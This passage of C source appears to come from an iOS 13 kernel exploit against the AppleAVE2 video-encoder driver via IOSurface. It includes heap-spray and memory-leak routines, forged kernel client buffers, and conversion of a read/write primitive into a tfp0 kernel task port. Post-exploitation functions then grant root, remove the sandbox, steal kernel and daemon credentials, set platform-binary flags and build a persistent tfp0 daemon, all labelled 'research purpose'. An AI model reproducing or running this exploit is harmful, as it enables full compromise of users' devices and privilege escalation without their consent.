address that is near prev stored conti_seqno[0] address\n                        conti_seqno[1] = new_addr;\n                    }\n                }\n            }\n            else if((new_addr - 0x30) == stored_addr){\n                // If mem right after new_addr is known previously sprayed\n                \n                if(!conti_seqno[0]){\n                    conti_seqno[0] = stored_addr;\n                } else if(!conti_seqno[1]){\n                    if((conti_seqno[0] != new_addr) && (conti_seqno[0] != (stored_addr - 0x30))){\n                        // Avoid store an address that is near prev stored conti_seqno[0] address\n                        conti_seqno[1] = stored_addr;\n                    }\n                }\n            }\n        }\n        \n        if(conti_seqno[1]){\n            // Collect enough conti memory spray, paveway stage completed.\n            break;\n        }\n        \n        if(!(paveway_sprayCnt % 300)){\n            // paveway_sprayAddrs is full, expanding the buf size\n            paveway_sprayAddrs = realloc(paveway_sprayAddrs, 8 * (paveway_sprayCnt + 300));\n        }\n    }\n    \n    for(int i=0; i<paveway_sprayCnt; i++){\n        if(paveway_sprayAddrs[i]){\n            if((paveway_sprayAddrs[i] == conti_seqno[0]) || (paveway_sprayAddrs[i] == conti_seqno[1])){\n                paveway_sprayAddrs[i] = 0;\n            }\n        }\n    }\n    \n    if(_pack_paveway == NULL){\n        _pack_paveway = calloc(1, 10 * sizeof(struct paveway_sprayAddrs_pack)); // 10 is default storage unit count of paveway_sprayAddrs_pack\n        _pack_pavewayCnt = 0;\n    }\n    \n    _pack_paveway[_pack_pavewayCnt].paveway_sprayAddrs = paveway_sprayAddrs;\n    _pack_paveway[_pack_pavewayCnt].paveway_sprayCnt = paveway_sprayCnt;\n    _pack_pavewayCnt ++;\n    \n    if(!(_pack_pavewayCnt % 10)){\n        // _pack_paveway is full, expanding the buf size\n        _pack_paveway = realloc(_pack_paveway, sizeof(struct 
paveway_sprayAddrs_pack) * (_pack_pavewayCnt + 10));\n    }\n    \n    (printf)(\"conti_seqno[0]: 0x%llx\\n\", conti_seqno[0]);\n    (printf)(\"conti_seqno[1]: 0x%llx\\n\", conti_seqno[1]);\n    \n    uint64_t real_spray[3] = {0};\n    real_spray[0] = conti_seqno[0];\n    real_spray[1] = alloc_kernel_40_mem();\n    real_spray[2] = conti_seqno[1];\n    \n    release_kernel_40_mem(real_spray[0]);\n    release_kernel_40_mem(real_spray[1]);\n    release_kernel_40_mem(real_spray[2]);\n    \n    (printf)(\"real_spray:\\n\");\n    (printf)(\"  0: 0x%llx\\n\", real_spray[0]);\n    (printf)(\"  1: 0x%llx\\n\", real_spray[1]);\n    (printf)(\"  2: 0x%llx\\n\", real_spray[2]);\n    \n    uint32_t criticle_index = 10;\n    \n    TT1_send_spray();\n    \n    uint64_t criticle_records[10] = {0};\n    uint64_t leaked_osdata = 0;\n    for(int i=0; i<150; i++){\n        uint64_t live_40buf = alloc_kernel_40_mem();\n        if(i<criticle_index){\n            criticle_records[i] = live_40buf;\n        }\n        \n        if(i == criticle_index){\n            // Interfering spray process while hopefully tend to begin showing stable output, so the desired address can stood-out\n            TT1_send_spray();\n            \n            if(criticle_records[0] == criticle_records[2]){\n                TT1_sprayid = TT1_sprayid - 1;\n                leaked_osdata = real_spray[0];\n            }\n            else if(real_spray[2] == criticle_records[2]){\n                if(real_spray[2] == criticle_records[8]){\n                    leaked_osdata = real_spray[2];\n                }\n            }\n            else{\n                (printf)(\"NOTHING!!!!\\n\");\n                //printf(\"========== RE-Attemp ====\\n\");\n                release_kernel_40_mem(live_40buf);\n                leaked_osdata = hohoo();\n                return leaked_osdata;\n            }\n        }\n        \n        if(i > criticle_index){\n            if(leaked_osdata && leaked_osdata == live_40buf){\n         
       // Target address been taken again, indicating was failure attempt, leaked_osdata is a false result\n                (printf)(\"**** 0x%llx Target address been taken again, indicating that was failure attempt.. reattemping...\\n\", live_40buf);\n                leaked_osdata = 0;\n                i = 0;\n            }\n        }\n        \n        (printf)(\"spraymap: 0x%llx\\n\", live_40buf);\n        release_kernel_40_mem(live_40buf);\n    }\n    \n    return leaked_osdata;\n}\n\nuint32_t TT1_hit_holes[TT1_holes_count] = {0};\nuint32_t TT1_hit_cnt = 0;\n\nvoid hohoo222(){\n    bzero(TT1_hit_holes, sizeof(TT1_hit_holes));\n    TT1_hit_cnt = 0;\n    \n    uint64_t leaked_osdata = 0;\n    while(1){\n        leaked_osdata = hohoo();\n        if(leaked_osdata)\n            break;\n    }\n    \n    TT2_send_spray();\n    IOSurfaceRootUserClient_sRemoveValue(InitInfo_surfaceId, 0xD701);\n    IOSurfaceRootUserClient_sRemoveValue(InitInfo_surfaceId, 0xD751);\n    IOSurfaceRootUserClient_sRemoveValue(InitInfo_surfaceId, 0xD7A1);\n    IOSurfaceRootUserClient_sRemoveValue(InitInfo_surfaceId, 0xD7F1);\n    IOSurfaceRootUserClient_sRemoveValue(InitInfo_surfaceId, 0xD841);\n    IOSurfaceRootUserClient_sRemoveValue(InitInfo_surfaceId, 0xD891);\n    IOSurfaceRootUserClient_sRemoveValue(InitInfo_surfaceId, 0xD8E1);\n    IOSurfaceRootUserClient_sRemoveValue(InitInfo_surfaceId, 0xD931);\n    IOSurfaceRootUserClient_sRemoveValue(InitInfo_surfaceId, 0xD9D1);\n    IOSurfaceRootUserClient_sRemoveValue(InitInfo_surfaceId, 0xDA21);\n    IOSurfaceRootUserClient_sRemoveValue(InitInfo_surfaceId, 0xDA71);\n    IOSurfaceRootUserClient_sRemoveValue(InitInfo_surfaceId, 0xDAC1);\n    IOSurfaceRootUserClient_sRemoveValue(InitInfo_surfaceId, 0xDB11);\n    IOSurfaceRootUserClient_sRemoveValue(InitInfo_surfaceId, 0xDB61);\n    IOSurfaceRootUserClient_sRemoveValue(InitInfo_surfaceId, 0xDBB1);\n    \n    \n    *(uint64_t*)(inputmap_InitInfo + 5936) = leaked_osdata + 0x18;\n    
alloc_kernel_40_mem_contains_iosurfacebuf();\n    empty_kernel_40_mem(leaked_osdata + 0x20);\n    \n    uint32_t confirm_TT1_sprayid = 0;\n    uint8_t failure_case_all7 = 0;\n    char *ccc = IOSurfaceRootUserClient_sCopyValue(InitInfo_surfaceId, TT1_sprayid);\n    ccc = ccc + 0x10;\n    confirm_TT1_sprayid = TT1_sprayid;\n    for(int i=0; i<TT1_holes_count; i++){\n        char *aaa = ccc + 0x80*i;\n        \n        if(i == 0){\n            kObject_AppleAVE2Driver = *(uint64_t*)(aaa+0x10);\n            kObject_IOSurface = *(uint64_t*)(aaa+0x20);\n        }\n        \n        (printf)(\"aaa: 0x%x 0x%x\\n\", *(uint32_t*)(aaa+0x10), *(uint32_t*)(aaa+0x18));\n        if(*(uint32_t*)(aaa+0x10) == 0x77777777){\n            failure_case_all7 = 1;\n            break;\n        }\n        if(*(uint32_t*)(aaa+0x10) == 0x66666666){\n            uint32_t id = *(uint32_t*)(aaa+0x18);\n            TT1_hit_holes[TT1_hit_cnt] = id;\n            TT1_hit_cnt++;\n            \n        }\n    }\n    \n    if(failure_case_all7 || (TT1_hit_cnt == 0)){\n        failure_case_all7 = 0;\n        confirm_TT1_sprayid = TT1_sprayid + 1;\n        char *ccc = IOSurfaceRootUserClient_sCopyValue(InitInfo_surfaceId, TT1_sprayid + 1);\n        ccc = ccc + 0x10;\n        for(int i=0; i<TT1_holes_count; i++){\n            char *aaa = ccc + 0x80*i;\n            \n            if(i == 0){\n                kObject_AppleAVE2Driver = *(uint64_t*)(aaa+0x10);\n                kObject_IOSurface = *(uint64_t*)(aaa+0x20);\n            }\n            \n            if(*(uint32_t*)(aaa+0x10) == 0x77777777){\n                (printf)(\"aaa(+1): 0x%x 0x%x\\n\", *(uint32_t*)(aaa+0x10), *(uint32_t*)(aaa+0x18));\n                failure_case_all7 = 1;\n                break;\n            }\n            if(*(uint32_t*)(aaa+0x10) == 0x66666666){\n                uint32_t id = *(uint32_t*)(aaa+0x18);\n                TT1_hit_holes[TT1_hit_cnt] = id;\n                TT1_hit_cnt++;\n            }\n        }\n        \n       
 if(failure_case_all7 || (TT1_hit_cnt == 0))\n        {\n            failure_case_all7 = 0;\n            confirm_TT1_sprayid = TT1_sprayid - 1;\n            ccc = IOSurfaceRootUserClient_sCopyValue(InitInfo_surfaceId, TT1_sprayid - 1);\n            ccc = ccc + 0x10;\n            for(int i=0; i<TT1_holes_count; i++){\n                char *aaa = ccc + 0x80*i;\n                \n                if(i == 0){\n                    kObject_AppleAVE2Driver = *(uint64_t*)(aaa+0x10);\n                    kObject_IOSurface = *(uint64_t*)(aaa+0x20);\n                }\n                \n                if(*(uint32_t*)(aaa+0x10) == 0x77777777){\n                    (printf)(\"aaa(-1): 0x%x 0x%x\\n\", *(uint32_t*)(aaa+0x10), *(uint32_t*)(aaa+0x18));\n                    failure_case_all7 = 1;\n                    break;\n                }\n                if(*(uint32_t*)(aaa+0x10) == 0x66666666){\n                    uint32_t id = *(uint32_t*)(aaa+0x18);\n                    TT1_hit_holes[TT1_hit_cnt] = id;\n                    TT1_hit_cnt++;\n                }\n            }\n        }\n    }\n    \n    if(failure_case_all7 || (TT1_hit_cnt == 0)){\n        (printf)(\"----(EMB) fallL!\\n\");\n        hohoo222();\n        return;\n    }\n    \n    TT1_sprayid = confirm_TT1_sprayid;\n}\n\n\nvoid clean_up_everything(){\n    for(int i=0; i<6; i++){\n        remove_client();\n    }\n}\n\n\nvoid prep_redirect_prev_clientbuf(uint64_t new_prev_clientbuf){\n    for(int i=0; i<3; i++){\n        *(uint64_t*)(inputmap_InitInfo + 147228) = new_prev_clientbuf; // 0x4000\n        *(uint64_t*)(inputmap_InitInfo + 130844) = new_prev_clientbuf; // 0x8000\n        *(uint64_t*)(inputmap_InitInfo + 114460) = new_prev_clientbuf; // 0xc000\n    }\n}\n\nvoid prep_fake_clientbuf(uint64_t genuine_UserClient_kobj){\n    \n    char *forge_clientbuf = inputmap_InitInfo + 0x24000;\n    uint64_t forge_clientbuf_kaddr = magic_addr + 0x24000;\n    bzero(forge_clientbuf, 0x29B98);\n    \n    
*(uint64_t*)(forge_clientbuf + 0x0) = genuine_UserClient_kobj;\n    *(forge_clientbuf + 0x27B58) = 0x1;\n    \n    char *forge_KernelFrameQueue = forge_clientbuf + 0x29B98;\n    uint64_t forge_KernelFrameQueue_kaddr = forge_clientbuf_kaddr + 0x29B98;\n    bzero(forge_KernelFrameQueue, 24);\n    *(uint64_t*)(forge_clientbuf + 0x27818) = forge_KernelFrameQueue_kaddr;\n    \n    char *forge_inputmap_FrameInfo = forge_KernelFrameQueue + 24;\n    uint64_t forge_inputmap_FrameInfo_kaddr = forge_KernelFrameQueue_kaddr + 24;\n    *(uint64_t*)(forge_KernelFrameQueue + 0x10) = forge_inputmap_FrameInfo_kaddr;\n    \n    *(uint32_t*)(forge_clientbuf + 0x8) = 0x0;\n    *(forge_clientbuf + 0x27B59) = 0x0;\n    \n    *(uint32_t*)(forge_inputmap_FrameInfo + 16) = 0x4569;\n    *(uint32_t*)(forge_clientbuf + 0x4FF0 + 112) = 0x1;\n    *(uint64_t*)(forge_clientbuf + 0x27838) = forge_inputmap_FrameInfo_kaddr + 0x2A000;\n    *(uint64_t*)(forge_inputmap_FrameInfo + 5936) = 0;\n}\n\nvoid clean_fake_clientbuf(){\n    char *forge_clientbuf = inputmap_InitInfo + 0x24000;\n    bzero(forge_clientbuf, 0x29B98);\n    \n    char *forge_KernelFrameQueue = forge_clientbuf + 0x29B98;\n    bzero(forge_KernelFrameQueue, 24);\n    \n    *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n}\n\nvoid prep_fake_clientbuf_read(uint64_t genuine_UserClient_kobj){\n    \n    char *forge_clientbuf = inputmap_InitInfo + 0x24000;\n    \n    //clientbuf->enable_switch_one_SetSessionSettings // always 0\n    *(forge_clientbuf + 0x27B59) = 0x1;\n}\n\n\n\n#pragma mark ---- Research Purpose ---- Basic for post-exp\n\nextern char *Build_resource_path(char *filename);\nextern int runCommand(const char *cmd, ...);\nextern int runCommandv(const char *cmd, int argc, const char * const* argv, void (^unrestrict)(pid_t));\n#define copyfile(X,Y) (copyfile)(X, Y, 0, COPYFILE_ALL|COPYFILE_RECURSIVE|COPYFILE_NOFOLLOW_SRC);\n\nvoid run_post_exp(){\n    \n    extern void safepatch_swap_unsandbox_and_root(uint64_t target_proc);\n    extern 
void safepatch_unswap_unsandbox_and_root(uint64_t target_proc);\n    \n    // TODO with TFP0\n    \n    safepatch_swap_unsandbox_and_root(our_proc_kAddr);\n    (printf)(\"now uid: %d\\n\", getuid());\n    \n    extern void build_tfp0_persistence_for_research_purpose(void);\n    build_tfp0_persistence_for_research_purpose();\n    extern void patch_codesign(void);\n    safepatch_unswap_unsandbox_and_root(our_proc_kAddr);\n    \n}\n\n#pragma mark ---- Research Purpose ---- Install tfp0-persis program\n\nuint32_t OFFSET_bsd_info_p_ucred = 0x100;\nuint32_t OFFSET_task_bsd_info = 0; // auto-gen: task->bsd_info\n\nuint64_t KernelLeak_portAddr(uint64_t target_task, uint32_t portname){\n    // Leak kernel ipc port stru address of the input port\n    \n    uint64_t leaked_port_stru_kAddr = 0;\n    \n    mach_port_t stored_ports[3] = {0};\n    stored_ports[0] = mach_task_self();\n    stored_ports[2] = portname;\n    mach_ports_register(mach_task_self(), stored_ports, 3);\n    \n    leaked_port_stru_kAddr = KernelRead_8bytes(target_task + OFFSET_task_itk_registered + 0x10);\n    \n    stored_ports[2] = 0;\n    mach_ports_register(mach_task_self(), stored_ports, 3);\n    \n    return leaked_port_stru_kAddr;\n}\n\nuint32_t KernelLeak_portAddr2(uint64_t target_task, uint64_t portStru){\n    // Leak kernel ipc port stru address of the input port\n    \n    mach_port_t *stored_ports = NULL;\n    mach_msg_type_number_t stored_portsCnt = 3;\n    \n    KernelWrite_8bytes(target_task + OFFSET_task_itk_registered + 0x10, portStru);\n    \n    mach_ports_lookup(mach_task_self(), &stored_ports, &stored_portsCnt);\n    uint32_t rt_p = stored_ports[2];\n    vm_deallocate(mach_task_self(), (vm_address_t)stored_ports, 4 * stored_portsCnt);\n    return rt_p;\n}\n\nvoid patch_install_tfp0(uint64_t target_task, uint64_t safe_tfp0){\n    KernelWrite_8bytes(target_task + OFFSET_task_itk_task_access, safe_tfp0);\n}\n\nvoid patch_remove_tfp0(uint64_t target_task){\n    KernelWrite_8bytes(target_task 
+ OFFSET_task_itk_task_access, 0);\n}\n\nmach_port_t patch_retrieve_tfp0(){\n    tfp0_port = 0;\n    task_get_special_port(mach_task_self(), TASK_ACCESS_PORT, &tfp0_port); // TASK_ACCESS_PORT is 8 in ios13 (for non-PAC), for PAC is 9\n    return tfp0_port;\n}\n\nvoid patch_TF_PLATFORM(uint64_t target_task){\n    uint32_t old_t_flags = KernelRead_4bytes(target_task + OFFSET_task_t_flags);\n    old_t_flags |= 0x00000400; // TF_PLATFORM\n    KernelWrite_4bytes(target_task + OFFSET_task_t_flags, old_t_flags);\n    \n    // used in kernel func: csproc_get_platform_binary\n}\n\nuint64_t ubc_cs_blob_get(uint64_t vp, int cputype, uint64_t offset){\n    \n    uint64_t uip = 0; // struct ubc_info *uip;\n    uint64_t blob = 0;\n    \n    if ( vp && KernelRead_2bytes(vp + 112) == 1 && (uip = KernelRead_8bytes(vp + 120)) != 0 ){\n        for (blob = KernelRead_8bytes(uip + 80); blob; blob = KernelRead_8bytes(blob)){\n            if (cputype != -1 && KernelRead_4bytes(blob + 8) == cputype)\n                break;\n            if(offset != -1){\n                uint64_t offset_in_blob = offset - KernelRead_8bytes(blob + 16);\n                if(offset_in_blob >= KernelRead_8bytes(blob + 24) && offset_in_blob < KernelRead_8bytes(blob + 32))\n                    break;\n            }\n        }\n    }\n    \n    return blob;\n}\n\nvoid patch_CS_PLATFORM_BINARY(uint64_t target_proc){\n    uint64_t p_textvp = KernelRead_8bytes(target_proc + 568); // confirmed same offsets on pac\n    if(!p_textvp)\n        return;\n    uint64_t p_textoff = KernelRead_8bytes(target_proc + 576);\n    uint64_t csblob = ubc_cs_blob_get(p_textvp, -1, p_textoff);\n    if(csblob){\n        KernelWrite_1byte(csblob + 168, 1); // csblob->csb_platform_binary\n    }\n}\n\nvoid patch_unsandbox_and_root(uint64_t target_proc, bool patch_root){\n    \n    uint64_t proc_p_ucred = KernelRead_8bytes(target_proc + OFFSET_bsd_info_p_ucred);\n    uint64_t p_ucred_obtain_rootAndUnsandbox = proc_p_ucred + 0x18;\n    \n    
char *old_cred = calloc(1, 0x68);\n    KernelRead_anySize(p_ucred_obtain_rootAndUnsandbox, old_cred, 0x68);\n    \n    uint64_t old_cr_label = *(uint64_t*)(old_cred + 0x60);\n    if(patch_root)\n        bzero(old_cred, 0x68);\n    \n    (printf)(\"old_cr_label: 0x%llx\\n\", old_cr_label);\n    if(old_cr_label){\n        *(uint64_t*)(old_cred + 0x60) = old_cr_label;\n        (printf)(\"old_cr_label+0: 0x%llx\\n\", KernelRead_8bytes(old_cr_label));\n        (printf)(\"old_cr_label+0x8: 0x%llx\\n\", KernelRead_8bytes(old_cr_label + 0x8));\n        (printf)(\"old_cr_label+0x10: 0x%llx\\n\", KernelRead_8bytes(old_cr_label + 0x10));\n        KernelWrite_8bytes(old_cr_label+0x10, 0x0);\n    }\n    \n    KernelWrite_anySize(p_ucred_obtain_rootAndUnsandbox, old_cred, 0x68);\n    free(old_cred);\n}\n\nchar *old_cred = NULL;\nuint64_t old_cr_label_content = 0;\nvoid safepatch_swap_unsandbox_and_root(uint64_t target_proc){\n    \n    uint64_t proc_p_ucred = KernelRead_8bytes(target_proc + OFFSET_bsd_info_p_ucred);\n    uint64_t p_ucred_obtain_rootAndUnsandbox = proc_p_ucred + 0x18;\n    \n    if(!old_cred){\n        old_cred = calloc(1, 0x68);\n    }\n    KernelRead_anySize(p_ucred_obtain_rootAndUnsandbox, old_cred, 0x68);\n    char *tmp_cred = calloc(1, 0x68);\n    memcpy(tmp_cred, old_cred, 0x68);\n    \n    uint64_t old_cr_label = *(uint64_t*)(old_cred + 0x60);\n    bzero(tmp_cred, 0x68);\n    \n    if(old_cr_label){\n        *(uint64_t*)(tmp_cred + 0x60) = old_cr_label;\n        old_cr_label_content = KernelRead_8bytes(old_cr_label+0x10);\n        KernelWrite_8bytes(old_cr_label+0x10, 0x0);\n    }\n    \n    KernelWrite_anySize(p_ucred_obtain_rootAndUnsandbox, tmp_cred, 0x68);\n    free(tmp_cred);\n}\n\nvoid safepatch_unswap_unsandbox_and_root(uint64_t target_proc){\n    \n    uint64_t proc_p_ucred = KernelRead_8bytes(target_proc + OFFSET_bsd_info_p_ucred);\n    uint64_t p_ucred_obtain_rootAndUnsandbox = proc_p_ucred + 0x18;\n    \n    
KernelWrite_anySize(p_ucred_obtain_rootAndUnsandbox, old_cred, 0x68);\n    \n    uint64_t old_cr_label = *(uint64_t*)(old_cred + 0x60);\n    if(old_cr_label){\n        KernelWrite_8bytes(old_cr_label+0x10, old_cr_label_content);\n    }\n}\n\nuint64_t myold_cred = 0;\nvoid safepatch_swap_kernel_cred(uint64_t target_proc){\n    \n    uint64_t kernel_proc = find_proc_byPID(0);\n    uint64_t kernel_p_ucred = KernelRead_8bytes(kernel_proc + OFFSET_bsd_info_p_ucred);\n    \n    myold_cred = KernelRead_8bytes(target_proc + OFFSET_bsd_info_p_ucred);\n    KernelWrite_8bytes(target_proc + OFFSET_bsd_info_p_ucred, kernel_p_ucred);\n}\n\nvoid safepatch_unswap_kernel_cred(uint64_t target_proc){\n    \n    KernelWrite_8bytes(target_proc + OFFSET_bsd_info_p_ucred, myold_cred);\n}\n\npid_t spindump_pid = 0;\nuint64_t spindump_proc_cred = 0;\nuint64_t myold_cred2 = 0;\nvoid safepatch_swap_spindump_cred(uint64_t target_proc){\n    \n    if(spindump_proc_cred == 0){\n        spindump_pid = 0;\n        if(!(spindump_pid = look_for_proc(\"/usr/sbin/spindump\"))){\n            // if spindump is not running at moment\n            if(fork() == 0){\n                daemon(1, 1);\n                close(STDIN_FILENO);\n                close(STDOUT_FILENO);\n                close(STDERR_FILENO);\n                execvp(\"/usr/sbin/spindump\", NULL);\n                exit(1);\n            }\n            while(!(spindump_pid = look_for_proc(\"/usr/sbin/spindump\"))){}\n        }\n        kill(spindump_pid, SIGSTOP);\n        uint64_t spindump_proc = find_proc_byPID(spindump_pid);\n        spindump_proc_cred = KernelRead_8bytes(spindump_proc + OFFSET_bsd_info_p_ucred);\n        \n        uint64_t target_task = KernelRead_8bytes(target_proc + OFFSET_bsd_info_task);\n        patch_TF_PLATFORM(target_task);\n        // this is a must-patch in order to get task-mani api to work\n    }\n    \n    myold_cred2 = KernelRead_8bytes(target_proc + OFFSET_bsd_info_p_ucred);\n    
KernelWrite_8bytes(target_proc + OFFSET_bsd_info_p_ucred, spindump_proc_cred);\n}\n\nvoid safepatch_unswap_spindump_cred(uint64_t target_proc){\n    \n    if(spindump_proc_cred){\n        kill(spindump_pid, SIGCONT);\n        kill(spindump_pid, SIGKILL);\n        \n        spindump_pid = 0;\n        spindump_proc_cred = 0;\n    }\n    \n    KernelWrite_8bytes(target_proc + OFFSET_bsd_info_p_ucred, myold_cred2);\n}\n\npid_t containermanagerd_pid = 0;\nuint64_t containermanagerd_proc_cred = 0;\nuint64_t myold_cred3 = 0;\nvoid safepatch_swap_containermanagerd_cred(uint64_t target_proc){\n    \n    if(containermanagerd_proc_cred == 0){\n        containermanagerd_pid = 0;\n        if(!(containermanagerd_pid = look_for_proc_basename(\"containermanagerd\"))){\n            // containermanagerd should always be runnning\n        }\n        uint64_t containermanagerd_proc = find_proc_byPID(containermanagerd_pid);\n        containermanagerd_proc_cred = KernelRead_8bytes(containermanagerd_proc + OFFSET_bsd_info_p_ucred);\n        \n        uint64_t target_task = KernelRead_8bytes(target_proc + OFFSET_bsd_info_task);\n        patch_TF_PLATFORM(target_task);\n        // this is a must-patch in order to get task-mani api to work\n    }\n    \n    myold_cred3 = KernelRead_8bytes(target_proc + OFFSET_bsd_info_p_ucred);\n    KernelWrite_8bytes(target_proc + OFFSET_bsd_info_p_ucred, containermanagerd_proc_cred);\n}\n\nvoid safepatch_unswap_containermanagerd_cred(uint64_t target_proc){\n    KernelWrite_8bytes(target_proc + OFFSET_bsd_info_p_ucred, myold_cred3);\n}\n\nvoid patch_root(uint64_t target_proc){\n    \n    uint64_t proc_p_ucred = KernelRead_8bytes(target_proc + OFFSET_bsd_info_p_ucred);\n    uint64_t p_ucred_obtain_rootAndUnsandbox = proc_p_ucred + 0x18;\n    \n    char *old_cred = calloc(1, 0x68);\n    KernelRead_anySize(p_ucred_obtain_rootAndUnsandbox, old_cred, 0x68);\n    \n    uint64_t old_cr_label = *(uint64_t*)(old_cred + 0x60);\n    bzero(old_cred, 0x68);\n    \n    
if(old_cr_label){\n        *(uint64_t*)(old_cred + 0x60) = old_cr_label;\n    }\n    \n    KernelWrite_anySize(p_ucred_obtain_rootAndUnsandbox, old_cred, 0x68);\n    free(old_cred);\n}\n\nuint64_t leaked_MIDIServerPort_addr = 0;\nuint64_t seek_out_proc_who_request_tfp0() {\n    uint64_t proc = KernelRead_8bytes(kaslr + HARDCODED_allproc);\n    \n    for (int i=0; i < 50; i++) {\n        // this loop start from the most recent new proc\n        \n        if(!proc)\n            return 0;\n        \n        uint64_t task = KernelRead_8bytes(proc + 0x10);\n        if(!task)\n            goto continue_1;\n        \n        uint64_t task_accesport = KernelRead_8bytes(task + OFFSET_task_itk_registered + 0x10); // check last item in itk_registered\n        if(!task_accesport || task_accesport != leaked_MIDIServerPort_addr)\n            goto continue_1;\n        \n        // attach tfp0 port\n        patch_install_tfp0(task, tfp0_portStru);\n        \n        // Awaiting util proc shown sign of took usage of tfp0\n        while((task_accesport = KernelRead_8bytes(task + OFFSET_task_itk_registered + 0x10))){\n        }\n        \n        // Remove the tfp0 pointer avoid dealloc problem\n        patch_remove_tfp0(task);\n        \n        \n    continue_1:\n        proc = KernelRead_8bytes(proc);\n    }\n    return 0;\n}\n\nvoid build_tfp0_persistence_for_research_purpose(){\n    \n    pid_t child_pid = fork();\n    if(child_pid == 0){\n        daemon(1, 1);\n        \n        do{\n            patch_retrieve_tfp0();\n        }while(tfp0_port == 0);\n        \n        uint64_t child_proc = find_proc_byPID(getpid());\n        uint64_t child_task = KernelRead_8bytes(child_proc + 0x10);\n    \n        mach_port_t midi_bsport = 0;\n        extern kern_return_t bootstrap_look_up(mach_port_t bp, const char *service_name, mach_port_t *sp);\n        bootstrap_look_up(bootstrap_port, \"com.apple.midiserver\", &midi_bsport);\n        if(midi_bsport)\n            
leaked_MIDIServerPort_addr = KernelLeak_portAddr(child_task, midi_bsport);\n        \n        int old_v = 0;\n        while(1){\n            uint32_t midiserver_ref = KernelRead_4bytes(leaked_MIDIServerPort_addr + offsetof(struct ipc_port, ip_references));\n            \n            if(!old_v || old_v > midiserver_ref)\n                old_v = midiserver_ref;\n            \n            if(midiserver_ref > old_v){\n                old_v = midiserver_ref;\n                \n                seek_out_proc_who_request_tfp0();\n            }\n            \n            sleep(1);\n        }\n        // shoud never reach here\n    }\n    \n    uint64_t child_proc = find_proc_byPID(child_pid);\n    uint64_t child_task = KernelRead_8bytes(child_proc + 0x10);\n    patch_install_tfp0(child_task, tfp0_portStru);\n}\n\n#pragma mark ---- exp ---- Convert R/W prim to TFP0\n\nvoid ios13_kernel_pwn(io_connect_t ioconn, io_connect_t surface_ioconn){\n    \n    pthread_setcancelstate(PTHREAD_CANCEL_ENABLE, NULL);\n    \n    uint64_t InitInfo_map_addr = 0, InitInfo_map_size = 0;\n    InitInfo_surfaceId = IOSurfaceRootUserClient_create_surface_map(surface_ioconn, &InitInfo_map_addr, (uint32_t*)&InitInfo_map_size);\n    \n    if(!InitInfo_surfaceId){\n        (printf)(\"exp failed!\\n\");\n        exit(1);\n    }\n    \n    (printf)(\"InitInfo_surfaceId: 0x%x\\n\", InitInfo_surfaceId);\n    Init_spraydata_for_TT1(InitInfo_surfaceId);\n    Init_spraydata_for_TT2(InitInfo_surfaceId);\n    \n    uint64_t *remap_local_addr = 0;\n    Send_overwritting_iosurfaceMap(InitInfo_map_addr, (uint64_t *)&remap_local_addr);\n    \n    inputmap_InitInfo = (char*)remap_local_addr;\n    \n    if(setjmp(reattempt_jmpb)){\n        (printf)(\"RRRReatrmpe 9afioasf..\\n\");\n        clean_up_everything();\n    }\n    \n    add_new_client();\n    add_new_client();\n    add_new_client();\n    add_new_client();\n    add_new_client();\n    add_new_client();\n    add_new_client();\n    \n    
*(uint32_t*)(inputmap_InitInfo + 13344) = 1;\n    *(uint32_t*)(inputmap_InitInfo + 13368) = 1;\n    *(uint32_t*)(inputmap_InitInfo + 2020) = 160;\n    *(uint32_t*)(inputmap_InitInfo + 2024) = 64;\n    *(uint32_t*)(inputmap_InitInfo + 0x10) = 0x4569;\n    *(uint32_t*)(inputmap_InitInfo + 12) = 5;\n    *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n    *(uint8_t*)(inputmap_InitInfo + 13377) = 1;\n    *(uint32_t*)(inputmap_InitInfo + 2028) = 1;\n    *(uint8_t*)(inputmap_InitInfo + 13288) = 1;\n    \n    {\n        char input_stru[0x110] = {0};\n        *(uint32_t*)(input_stru + 8) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 12) = InitInfo_surfaceId;\n        \n        *(uint64_t*)(input_stru + 16) = InitInfo_surfaceId;\n        \n        *(uint64_t*)(input_stru + 24) = InitInfo_surfaceId;\n        \n        *(uint64_t*)(input_stru + 28) = InitInfo_surfaceId;\n        *(uint64_t*)(input_stru + 32) = InitInfo_surfaceId;\n        *(uint64_t*)(input_stru + 36) = InitInfo_surfaceId;\n        *(uint64_t*)(input_stru + 40) = InitInfo_surfaceId;\n        *(uint64_t*)(input_stru + 44) = InitInfo_surfaceId;\n        \n        *(uint32_t*)(input_stru + 184) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 188) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 192) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 196) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 200) = InitInfo_surfaceId;\n        \n        *(uint32_t*)(input_stru + 204) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 208) = InitInfo_surfaceId;\n        \n        *(uint32_t*)(input_stru + 212) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 216) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 220) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 224) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 228) = InitInfo_surfaceId;\n        \n        *(uint32_t*)(input_stru + 232) = InitInfo_surfaceId;\n        
*(uint32_t*)(input_stru + 236) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 240) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 244) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 248) = InitInfo_surfaceId;\n        \n        *(uint32_t*)(input_stru + 48) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 52) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 56) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 60) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 64) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 68) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 72) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 76) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 80) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 84) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 88) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 92) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 96) = InitInfo_surfaceId;\n        *(uint32_t*)(input_stru + 100) = InitInfo_surfaceId;\n        